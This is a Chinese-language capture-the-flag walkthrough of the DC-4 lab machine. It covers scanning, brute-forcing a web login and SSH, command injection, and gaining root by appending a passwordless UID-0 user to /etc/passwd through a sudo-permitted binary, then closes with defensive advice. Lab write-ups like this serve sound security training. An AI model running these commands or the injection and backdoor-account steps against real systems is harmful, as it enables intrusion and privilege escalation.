VnlnHub DC-4
字数 926 2025-08-12 11:34:30

DC-4 靶场渗透测试详细教学文档

一、靶场环境搭建

  1. 下载镜像

    • 从VnlnHub获取DC-4的.OVA格式镜像文件
    • 直接导入VMware Workstation,指定解压位置
  2. 网络配置

    • 选择NAT网络模式
    • 确保与Kali攻击机在同一网段
  3. 启动靶机

    • 导入完成后直接启动虚拟机
    • 靶场搭建完成,无需额外配置

二、信息收集

  1. 发现目标IP

    nmap -sP -T4 192.168.48.0/24
    
    • 扫描结果:192.168.48.140(靶机)
  2. 端口扫描

    nmap -sS -A -p 1-65535 192.168.48.140
    
    • 开放端口:
      • 22/tcp - SSH服务
      • 80/tcp - HTTP服务

三、Web应用渗透

  1. Web界面分析

    • 访问http://192.168.48.140
    • 发现登录表单
  2. 爆破登录凭证

    • 使用Burp Suite抓取登录请求
    • 发送到Intruder模块进行爆破
    • 成功爆破出密码:happy
  3. 命令注入漏洞

    • 登录后发现命令执行功能
    • 抓包分析发现可修改命令参数
    • 尝试执行任意命令:
      ; whoami
      
    • 确认当前用户为普通权限

四、横向移动

  1. 枚举系统用户

    cat /etc/passwd
    ls -l /home
    
    • 发现用户:charles、jim、sam
  2. 发现密码字典

    cat /home/jim/backups/old-passwords.bak
    
    • 获取潜在密码列表
  3. SSH爆破

    hydra -L dc4user.txt -P dc4pass.TXT 192.168.48.140 ssh
    
    • 成功爆破出凭证:jim/jibril04
  4. 获取charles密码

    • 登录jim账户后检查邮件:
      cat /var/mail/jim
      
    • 发现charles的密码

五、权限提升

  1. 检查sudo权限

    sudo -l
    
    • 发现特权命令:teehee
  2. teehee命令利用

    • 查看帮助信息:
      teehee --help
      
    • 发现-a参数可追加文件内容
  3. 创建特权用户

    echo "qwe::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
    
    • 添加UID为0的特权用户qwe
  4. 获取root权限

    su qwe
    
    • 成功切换为root用户

六、获取flag

cd /root
cat flag.txt

七、总结与安全建议

  1. 漏洞总结

    • 弱密码策略
    • Web应用命令注入漏洞
    • 不安全的sudo配置
    • 敏感信息泄露(密码字典、邮件)
  2. 防御建议

    • 实施强密码策略
    • 对用户输入进行严格过滤
    • 限制sudo权限
    • 定期检查系统敏感文件权限
    • 避免在邮件中存储敏感凭证
  3. 渗透测试方法论

    • 信息收集 → 漏洞发现 → 初始访问 → 权限提升 → 目标达成
    • 注意利用现有信息进行横向移动(如发现的密码字典)

本教程详细记录了DC-4靶场的完整渗透过程,涵盖了从信息收集到最终获取root权限的所有关键步骤,可作为Linux系统渗透测试的典型案例学习。

DC-4 靶场渗透测试详细教学文档 一、靶场环境搭建 下载镜像 : 从VnlnHub获取DC-4的.OVA格式镜像文件 直接导入VMware Workstation,指定解压位置 网络配置 : 选择NAT网络模式 确保与Kali攻击机在同一网段 启动靶机 : 导入完成后直接启动虚拟机 靶场搭建完成,无需额外配置 二、信息收集 发现目标IP : 扫描结果:192.168.48.140(靶机) 端口扫描 : 开放端口: 22/tcp - SSH服务 80/tcp - HTTP服务 三、Web应用渗透 Web界面分析 : 访问http://192.168.48.140 发现登录表单 爆破登录凭证 : 使用Burp Suite抓取登录请求 发送到Intruder模块进行爆破 成功爆破出密码: happy 命令注入漏洞 : 登录后发现命令执行功能 抓包分析发现可修改命令参数 尝试执行任意命令: 确认当前用户为普通权限 四、横向移动 枚举系统用户 : 发现用户:charles、jim、sam 发现密码字典 : 获取潜在密码列表 SSH爆破 : 成功爆破出凭证:jim/jibril04 获取charles密码 : 登录jim账户后检查邮件: 发现charles的密码 五、权限提升 检查sudo权限 : 发现特权命令: teehee teehee命令利用 : 查看帮助信息: 发现 -a 参数可追加文件内容 创建特权用户 : 添加UID为0的特权用户qwe 获取root权限 : 成功切换为root用户 六、获取flag 七、总结与安全建议 漏洞总结 : 弱密码策略 Web应用命令注入漏洞 不安全的sudo配置 敏感信息泄露(密码字典、邮件) 防御建议 : 实施强密码策略 对用户输入进行严格过滤 限制sudo权限 定期检查系统敏感文件权限 避免在邮件中存储敏感凭证 渗透测试方法论 : 信息收集 → 漏洞发现 → 初始访问 → 权限提升 → 目标达成 注意利用现有信息进行横向移动(如发现的密码字典) 本教程详细记录了DC-4靶场的完整渗透过程,涵盖了从信息收集到最终获取root权限的所有关键步骤,可作为Linux系统渗透测试的典型案例学习。